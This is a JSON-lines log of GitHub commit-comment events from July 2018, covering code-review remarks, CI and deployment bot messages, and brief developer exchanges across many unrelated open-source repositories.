{"id":"8030311124","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29862778,"position":null,"line":null,"path":null,"commit_id":"7759325ad3b125bf34f91c7e620ff2177d0ac64a","created_at":"2018-07-27T19:07:35Z","updated_at":"2018-07-27T19:07:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-435](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-435).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-435-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-27T19:07:35Z"}
{"id":"8030319655","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29862810,"position":64,"line":52,"path":"math/octave-symbolic/Portfile","commit_id":"76fc6aa932eed737bffec7936b5220db09bd5305","created_at":"2018-07-27T19:09:40Z","updated_at":"2018-07-27T19:09:40Z","author_association":"CONTRIBUTOR","body":"Port py37-sympy does not exist..."}},"created_at":"2018-07-27T19:09:40Z"}
{"id":"8030325695","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29862821,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T19:11:07Z","updated_at":"2018-07-27T19:11:07Z","author_association":"COLLABORATOR","body":"I'm also getting some Index errors in the LazyVariables when running .backward() on a function of the posterior (when evaluating at > n_train points, o/w I can't evaluate at all, see above). Not sure if this is a symptom of the same underlying issue, or something else."}},"created_at":"2018-07-27T19:11:07Z"}
{"id":"8030326170","type":"CommitCommentEvent","actor":{"login":"nguyenhoan"},"repo":{"name":"boalang/compiler"},"payload":{"comment":{"id":29862822,"position":7,"line":352,"path":"src/java/boa/runtime/BoaAbstractVisitor.java","commit_id":"1326ea8c94e67f99fedf80e8a6abb8b72bb8bc4d","created_at":"2018-07-27T19:11:13Z","updated_at":"2018-07-27T19:11:13Z","author_association":"CONTRIBUTOR","body":"@psybers \r\nThis implementation of the visitor requires consistent updates with changes to the protobuf format.\r\n\r\nWhat about this?\r\nhttps://github.com/boalang/compiler/blob/master/src/java/boa/datagen/util/ProtoMessageVisitor.java"}},"created_at":"2018-07-27T19:11:13Z"}
{"id":"8030327086","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"adeynes/cucumber"},"payload":{"comment":{"id":29862825,"position":null,"line":null,"path":null,"commit_id":"da309db123fedca9a4fa93e95da1d04fc5f17ea0","created_at":"2018-07-27T19:11:26Z","updated_at":"2018-07-27T19:11:26Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): parsing error encountered\nduring parsing: did not find expected '-' indicator (line 9, column 7),\ncontext while parsing a block collection (line 8, column 7) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/adeynes/cucumber/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `db04e6e2-91d0-11e8-97ce-0bd616cb7bf1`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-27T19:11:26Z"}
{"id":"8030331744","type":"CommitCommentEvent","actor":{"login":"jacobrgardner"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29862833,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T19:12:25Z","updated_at":"2018-07-27T19:12:25Z","author_association":"MEMBER","body":"Is that specific to this notebook or a general problem @Balandat?"}},"created_at":"2018-07-27T19:12:25Z"}
{"id":"8030333052","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29862839,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T19:12:42Z","updated_at":"2018-07-27T19:12:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T19:12:42Z"}
{"id":"8030333379","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29862841,"position":14,"line":14,"path":"math/nanoflann/Portfile","commit_id":"891aaf3996d562e9e1640b310231c641fa7090db","created_at":"2018-07-27T19:12:46Z","updated_at":"2018-07-27T19:12:46Z","author_association":"CONTRIBUTOR","body":"If it's header-only, shouldn't it be `supported_archs noarch`?"}},"created_at":"2018-07-27T19:12:46Z"}
{"id":"8030333569","type":"CommitCommentEvent","actor":{"login":"inferno8"},"repo":{"name":"inferno8/wesnoth-Era_of_Magic"},"payload":{"comment":{"id":29862842,"position":null,"line":null,"path":null,"commit_id":"02b943bba5a72c640bc3d2a26a478b2b3d6fa855","created_at":"2018-07-27T19:12:48Z","updated_at":"2018-07-27T19:12:48Z","author_association":"OWNER","body":"Good to know, thanks."}},"created_at":"2018-07-27T19:12:48Z"}
{"id":"8030334140","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862845,"position":null,"line":null,"path":null,"commit_id":"8524320518b79a8befbe86dc438dbe00abb7e43a","created_at":"2018-07-27T19:12:56Z","updated_at":"2018-07-27T19:12:56Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1011](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1011).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1011-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T19:12:56Z"}
{"id":"8030338876","type":"CommitCommentEvent","actor":{"login":"marktsuchida"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29862857,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-27T19:14:03Z","updated_at":"2018-07-27T19:14:03Z","author_association":"MEMBER","body":"Well, no worries. Except I have no idea what to do now...\r\nI'm going to think about it a little."}},"created_at":"2018-07-27T19:14:03Z"}
{"id":"8030341915","type":"CommitCommentEvent","actor":{"login":"sandain"},"repo":{"name":"MinecraftServerControl/msc-gui"},"payload":{"comment":{"id":29862866,"position":null,"line":null,"path":null,"commit_id":"2bb765041fcb7a036d1ada6b9ee34e61af314658","created_at":"2018-07-27T19:14:45Z","updated_at":"2018-07-27T19:14:45Z","author_association":"MEMBER","body":"Ohh shoot. I noticed that and thought that I immediately committed a fix.  I just logged on to my development box and submitted the fix with commit fbfafaf6521f4695955f53ea018d41c1ed0434f0.  Thanks for the bug report."}},"created_at":"2018-07-27T19:14:45Z"}
{"id":"8030342210","type":"CommitCommentEvent","actor":{"login":"twistlock-scan"},"repo":{"name":"sagansystems/chamber"},"payload":{"comment":{"id":29862867,"position":null,"line":null,"path":null,"commit_id":"9f5a34e9ae37859ad1a28923d4ff3f1f0fdd238a","created_at":"2018-07-27T19:14:49Z","updated_at":"2018-07-27T19:14:49Z","author_association":"NONE","body":"\n\n<table>\n    <thead>\n        <tr>\n            <th></th>\n            <th>Status</th>\n            <th>Critical</th>\n            <th>High</th>\n            <th>Medium</th>\n            <th>Low</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n    <td>Compliance</td>\n    <td>PASSED</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n</tr>\n        <tr>\n    <td>Vulnerabilities</td>\n    <td>PASSED</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n</tr>\n    </tbody>\n</table>\n\nCompliance threshold requires 0 critical (or more severe) issues\nVulnerabily threshold requires 0 critical (or more severe) issues"}},"created_at":"2018-07-27T19:14:49Z"}
{"id":"8030343183","type":"CommitCommentEvent","actor":{"login":"marktsuchida"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29862870,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-27T19:15:02Z","updated_at":"2018-07-27T19:15:02Z","author_association":"MEMBER","body":"Also, it's not clear to me if this PR was meant to be based off of mm2, rather than master?"}},"created_at":"2018-07-27T19:15:02Z"}
{"id":"8030346286","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"RedPRL/redtt"},"payload":{"comment":{"id":29862878,"position":null,"line":null,"path":null,"commit_id":"d70b6d42aaa309ec62e5ae08dd0fd8bde8ff1a85","created_at":"2018-07-27T19:15:45Z","updated_at":"2018-07-27T19:15:45Z","author_association":"COLLABORATOR","body":"good idea, thanks! feel free to make any related improvements as well."}},"created_at":"2018-07-27T19:15:45Z"}
{"id":"8030346912","type":"CommitCommentEvent","actor":{"login":"FlorianSW"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29862880,"position":null,"line":null,"path":null,"commit_id":"ca21732c6ba851a38843e54ebc2cc640bb50475e","created_at":"2018-07-27T19:15:55Z","updated_at":"2018-07-27T19:15:55Z","author_association":"CONTRIBUTOR","body":"*yay* Thanks :)"}},"created_at":"2018-07-27T19:15:55Z"}
{"id":"8030357462","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29862908,"position":null,"line":null,"path":null,"commit_id":"558c85bcb23ae8bf9693452c51d351a57797ba44","created_at":"2018-07-27T19:18:28Z","updated_at":"2018-07-27T19:18:28Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-74](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-74).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-74-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T19:18:28Z"}
{"id":"8030358113","type":"CommitCommentEvent","actor":{"login":"cdavis4"},"repo":{"name":"cdavis4/Group4_Project"},"payload":{"comment":{"id":29862909,"position":null,"line":null,"path":null,"commit_id":"0a629b1eeb5fbdc7c80ff2a66b2b7444c77b40a8","created_at":"2018-07-27T19:18:38Z","updated_at":"2018-07-27T19:18:38Z","author_association":"OWNER","body":"@patrickbyrne1 thanks. do you think then we can remove the survival as a data member from ant and use this one? doing the write up and looking over the code."}},"created_at":"2018-07-27T19:18:38Z"}
{"id":"8030362112","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29862920,"position":138,"line":138,"path":"main.rb","commit_id":"2e9489863278831a060a702fbab2d2f0b20310cb","created_at":"2018-07-27T19:19:37Z","updated_at":"2018-07-27T19:19:37Z","author_association":"NONE","body":"Что за \"пляски\" с отступами? 😄 "}},"created_at":"2018-07-27T19:19:37Z"}
{"id":"8030362349","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29862924,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T19:19:40Z","updated_at":"2018-07-27T19:19:40Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T19:19:40Z"}
{"id":"8030362826","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29862925,"position":11,"line":21,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java","commit_id":"f987af8eafced461f40997785d1735976131165f","created_at":"2018-07-27T19:19:48Z","updated_at":"2018-07-27T19:19:48Z","author_association":"OWNER","body":"Thanks Yang!"}},"created_at":"2018-07-27T19:19:48Z"}
{"id":"8030369360","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862938,"position":null,"line":null,"path":null,"commit_id":"b0da92be1b323ce4c77cc18e3e4631c77fa91e34","created_at":"2018-07-27T19:21:25Z","updated_at":"2018-07-27T19:21:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1012](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1012).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1012-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T19:21:25Z"}
{"id":"8030369408","type":"CommitCommentEvent","actor":{"login":"hatchcliff"},"repo":{"name":"hatchcliff/atari800"},"payload":{"comment":{"id":29862939,"position":null,"line":null,"path":null,"commit_id":"4802844dce0d23647c9b676be3371a37bc059794","created_at":"2018-07-27T19:21:25Z","updated_at":"2018-07-27T19:21:25Z","author_association":"OWNER","body":"In Raspbian Stretch the Broadcom libraries brcmGLESv2 and brcmEGL have superseded GLESv2 and EGL.  This change finds the correct libraries when the --target=rpi configure option is used.  It makes atari800 v4 dependent on Raspbian Stretch or later, which seems reasonable because Stretch predates v4."}},"created_at":"2018-07-27T19:21:25Z"}
{"id":"8030371003","type":"CommitCommentEvent","actor":{"login":"Panchajanya1999"},"repo":{"name":"shekhawat2/android_kernel_xiaomi_whyred"},"payload":{"comment":{"id":29862946,"position":null,"line":null,"path":null,"commit_id":"d2e8f3178c41554a9e18f9d538dd1ae07ede960e","created_at":"2018-07-27T19:21:47Z","updated_at":"2018-07-27T19:21:47Z","author_association":"NONE","body":"ye quick thaw kya karta bro?\r\n"}},"created_at":"2018-07-27T19:21:47Z"}
{"id":"8030373002","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29862948,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T19:22:17Z","updated_at":"2018-07-27T19:22:17Z","author_association":"COLLABORATOR","body":"I believe this is specific to using the KroneckerProductLazyVariable as in this nb."}},"created_at":"2018-07-27T19:22:17Z"}
{"id":"8030375990","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29862954,"position":null,"line":null,"path":null,"commit_id":"bde0208400a24461e4ac7923dae01c7f9b6dc373","created_at":"2018-07-27T19:23:00Z","updated_at":"2018-07-27T19:23:00Z","author_association":"OWNER","body":"Nope, you cannot just disable farmhash. We do check the CPU features in cmake."}},"created_at":"2018-07-27T19:23:00Z"}
{"id":"8030376269","type":"CommitCommentEvent","actor":{"login":"wendlericasei"},"repo":{"name":"usmansadiq786/angular-revolution-fixed"},"payload":{"comment":{"id":29862955,"position":null,"line":null,"path":null,"commit_id":"348669ae53b16b036e0c779a8f2bab8524846828","created_at":"2018-07-27T19:23:05Z","updated_at":"2018-07-27T19:23:05Z","author_association":"NONE","body":"Is this version compatible with the revolution 5.4?"}},"created_at":"2018-07-27T19:23:05Z"}
{"id":"8030402688","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29863027,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T19:29:37Z","updated_at":"2018-07-27T19:29:37Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T19:29:37Z"}
{"id":"8030404376","type":"CommitCommentEvent","actor":{"login":"Badya"},"repo":{"name":"Miha-x64/reactive-properties"},"payload":{"comment":{"id":29863032,"position":43,"line":43,"path":"sql/src/main/kotlin/net/aquadc/properties/sql/jdbc-sqlite.kt","commit_id":"602558355d2936615ebec1622b92df7bb66ce43b","created_at":"2018-07-27T19:30:02Z","updated_at":"2018-07-27T19:30:02Z","author_association":"NONE","body":"may produce IllegalStateException"}},"created_at":"2018-07-27T19:30:02Z"}
{"id":"8030407216","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29863041,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-27T19:30:40Z","updated_at":"2018-07-27T19:30:40Z","author_association":"NONE","body":"IOST is currently available on all top 5 exhanges: Upbit, Binance,\nBitfiniex, Huobi, and Okex. You can also trade IOST on other 20+ major\nexchanges ! https://hub.iost.io/register?inviteCode=S10INCf4Q\n\nOn Fri, Jul 27, 2018 at 1:07 PM, Kamal901 <notifications@github.com> wrote:\n\n> good job guys\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29861221>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXcCHYUpL1kwNQ04Zg_jBC9p0So0dks5uK0jUgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-27T19:30:40Z"}
{"id":"8030407464","type":"CommitCommentEvent","actor":{"login":"Badya"},"repo":{"name":"Miha-x64/reactive-properties"},"payload":{"comment":{"id":29863043,"position":44,"line":44,"path":"sql/src/main/kotlin/net/aquadc/properties/sql/jdbc-sqlite.kt","commit_id":"602558355d2936615ebec1622b92df7bb66ce43b","created_at":"2018-07-27T19:30:44Z","updated_at":"2018-07-27T19:30:44Z","author_association":"NONE","body":"may produce SQLException on `commit()` or `rollback()`"}},"created_at":"2018-07-27T19:30:44Z"}
{"id":"8030409081","type":"CommitCommentEvent","actor":{"login":"Badya"},"repo":{"name":"Miha-x64/reactive-properties"},"payload":{"comment":{"id":29863047,"position":46,"line":46,"path":"sql/src/main/kotlin/net/aquadc/properties/sql/jdbc-sqlite.kt","commit_id":"602558355d2936615ebec1622b92df7bb66ce43b","created_at":"2018-07-27T19:31:08Z","updated_at":"2018-07-27T19:31:08Z","author_association":"NONE","body":"If Exception occurs - never unlocks"}},"created_at":"2018-07-27T19:31:08Z"}
{"id":"8030410981","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29863051,"position":null,"line":null,"path":null,"commit_id":"5c0b9232941bc6475657df4d9eb824e2746230ce","created_at":"2018-07-27T19:31:36Z","updated_at":"2018-07-27T19:31:36Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-187](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-187).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-187-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-27T19:31:36Z"}
{"id":"8030412340","type":"CommitCommentEvent","actor":{"login":"LordVenom"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29863055,"position":null,"line":null,"path":null,"commit_id":"09b29de0ead096e0c5a286e3dfc4d6e9efc0d4db","created_at":"2018-07-27T19:31:56Z","updated_at":"2018-07-27T19:31:56Z","author_association":"COLLABORATOR","body":"Oui c'est bien comme tu as fait."}},"created_at":"2018-07-27T19:31:56Z"}
{"id":"8030425400","type":"CommitCommentEvent","actor":{"login":"turtlelovesshoes"},"repo":{"name":"turtlelovesshoes/SUMO_july"},"payload":{"comment":{"id":29863090,"position":14,"line":182,"path":"julySUMO.html","commit_id":"1db269947838f80da97c370d92cdd63ea83bbc3d","created_at":"2018-07-27T19:35:08Z","updated_at":"2018-07-27T19:35:08Z","author_association":"OWNER","body":"this will not work"}},"created_at":"2018-07-27T19:35:08Z"}
{"id":"8030428096","type":"CommitCommentEvent","actor":{"login":"ziqilin0"},"repo":{"name":"zeyuanxy/hacker-rank"},"payload":{"comment":{"id":29863096,"position":null,"line":null,"path":null,"commit_id":"d74dfa221f5ea1fd7db00c5895ce104d1141dcb0","created_at":"2018-07-27T19:35:47Z","updated_at":"2018-07-27T19:35:47Z","author_association":"NONE","body":"performance issue: Terminated due to timeout"}},"created_at":"2018-07-27T19:35:47Z"}
{"id":"8030428677","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29863098,"position":null,"line":null,"path":null,"commit_id":"b5640b06c3b6bb45e5a62585ad73c93861a8619b","created_at":"2018-07-27T19:35:55Z","updated_at":"2018-07-27T19:35:55Z","author_association":"COLLABORATOR","body":"What this does is reduces lines from the log such as \r\n> 257c257\r\n< \\label{Table:useCaseTable}\r\n---\r\n> \\label{useCaseTable}\r\n. \r\nI think this is a desirable update because the labels only need to be focused on the nature of the contents of what it represents instead of the format of it (since that can be determined in the printing stage asnyway as it is here). @JacquesCarette @szymczdm does that make sense or is it going in the wrong direction somehow?"}},"created_at":"2018-07-27T19:35:55Z"}
{"id":"8030430362","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29863101,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T19:36:21Z","updated_at":"2018-07-27T19:36:21Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T19:36:21Z"}
{"id":"8030433897","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29863112,"position":null,"line":null,"path":null,"commit_id":"02ef283341c9486ecfc130b0cb7065a9217a1b3a","created_at":"2018-07-27T19:37:15Z","updated_at":"2018-07-27T19:37:15Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-50](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-50-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-27T19:37:15Z"}
{"id":"8030436265","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29863117,"position":null,"line":null,"path":null,"commit_id":"e5fc49b9e1d9f04c8d151d01a8ad790d175d1d98","created_at":"2018-07-27T19:37:49Z","updated_at":"2018-07-27T19:37:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1014](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1014).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1014-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T19:37:49Z"}
{"id":"8030440018","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863123,"position":2,"line":2,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:38:44Z","updated_at":"2018-07-27T19:38:44Z","author_association":"NONE","body":"Лучше избегать дублирования названия класса с методом. То есть `@station.station_name` звучит как масло маслянное. А вот `@station.name` - то, что надо. Мы говорим объекту станции вернуть свое имя."}},"created_at":"2018-07-27T19:38:44Z"}
{"id":"8030440376","type":"CommitCommentEvent","actor":{"login":"MartinBrude"},"repo":{"name":"laueressea/Calculator"},"payload":{"comment":{"id":29863126,"position":20,"line":20,"path":"index.html","commit_id":"44b6e7f7a236674717ee97d3cabb116c7520a5b9","created_at":"2018-07-27T19:38:49Z","updated_at":"2018-07-27T19:38:49Z","author_association":"NONE","body":"please use just btn or button, as you prefer. "}},"created_at":"2018-07-27T19:38:49Z"}
{"id":"8030440701","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863129,"position":4,"line":10,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T19:38:53Z","updated_at":"2018-07-27T19:38:53Z","author_association":"NONE","body":"ТЗ: \r\n\"Класс Route (Маршрут):\r\n- Имеет начальную и конечную станцию, а также список промежуточных станций. Начальная и конечная станции указываютсся при создании маршрута, а промежуточные могут добавляться между ними.\r\n- Может добавлять промежуточную станцию в список\r\n- Может удалять промежуточную станцию из списка\r\n...\"\r\nпро возможность изменения начальной и конечной станции в ТЗ ничего не сказано, значит такой возможности быть не должно\r\nпро возможность добавления и удаления промежуточных станций речь идет, поэтому для этого функционала методы нужны"}},"created_at":"2018-07-27T19:38:53Z"}
{"id":"8030441312","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"vit9696/sdl-gpu"},"payload":{"comment":{"id":29863130,"position":null,"line":null,"path":null,"commit_id":"561387f4b17441e05015f87f6b5004e113af9951","created_at":"2018-07-27T19:39:03Z","updated_at":"2018-07-27T19:39:03Z","author_association":"OWNER","body":"Yes, it does seem to work fine with this change. I rebased our patches on top of your changes here: https://github.com/vit9696/sdl-gpu/tree/develop"}},"created_at":"2018-07-27T19:39:03Z"}
{"id":"8030442113","type":"CommitCommentEvent","actor":{"login":"MartinBrude"},"repo":{"name":"laueressea/Calculator"},"payload":{"comment":{"id":29863140,"position":21,"line":21,"path":"js/calcucode.js","commit_id":"44b6e7f7a236674717ee97d3cabb116c7520a5b9","created_at":"2018-07-27T19:39:15Z","updated_at":"2018-07-27T19:39:15Z","author_association":"NONE","body":"don´t forget to use undefine instead of \"null\" "}},"created_at":"2018-07-27T19:39:15Z"}
{"id":"8030444424","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863143,"position":4,"line":10,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T19:39:49Z","updated_at":"2018-07-27T19:39:49Z","author_association":"NONE","body":"если про \"прайват\" пока нет знаний, значит выход один - просто удалить сеттеры и оставить только геттеры"}},"created_at":"2018-07-27T19:39:49Z"}
{"id":"8030445197","type":"CommitCommentEvent","actor":{"login":"MartinBrude"},"repo":{"name":"laueressea/Calculator"},"payload":{"comment":{"id":29863149,"position":42,"line":42,"path":"js/calcucode.js","commit_id":"44b6e7f7a236674717ee97d3cabb116c7520a5b9","created_at":"2018-07-27T19:40:00Z","updated_at":"2018-07-27T19:40:00Z","author_association":"NONE","body":"actually, you can extract this condition into a var o a function, will have better readability. "}},"created_at":"2018-07-27T19:40:00Z"}
{"id":"8030446762","type":"CommitCommentEvent","actor":{"login":"MartinBrude"},"repo":{"name":"laueressea/Calculator"},"payload":{"comment":{"id":29863150,"position":9,"line":9,"path":"js/calcucode.js","commit_id":"44b6e7f7a236674717ee97d3cabb116c7520a5b9","created_at":"2018-07-27T19:40:23Z","updated_at":"2018-07-27T19:40:23Z","author_association":"NONE","body":"please comments in english as well"}},"created_at":"2018-07-27T19:40:23Z"}
{"id":"8030447808","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863155,"position":2,"line":2,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:40:38Z","updated_at":"2018-07-27T19:40:38Z","author_association":"NONE","body":"Так-же `:trains_availability` название, которое не отражает сути. Оно подразумевает, что у нас будет \"доступность поезда\", а на самом деле там коллекиця объектов поездов. То есть reader должен называться `:trains`"}},"created_at":"2018-07-27T19:40:38Z"}
{"id":"8030449961","type":"CommitCommentEvent","actor":{"login":"DonJayamanne"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29863159,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-27T19:41:11Z","updated_at":"2018-07-27T19:41:11Z","author_association":"NONE","body":"Let's discuss on Monday. "}},"created_at":"2018-07-27T19:41:11Z"}
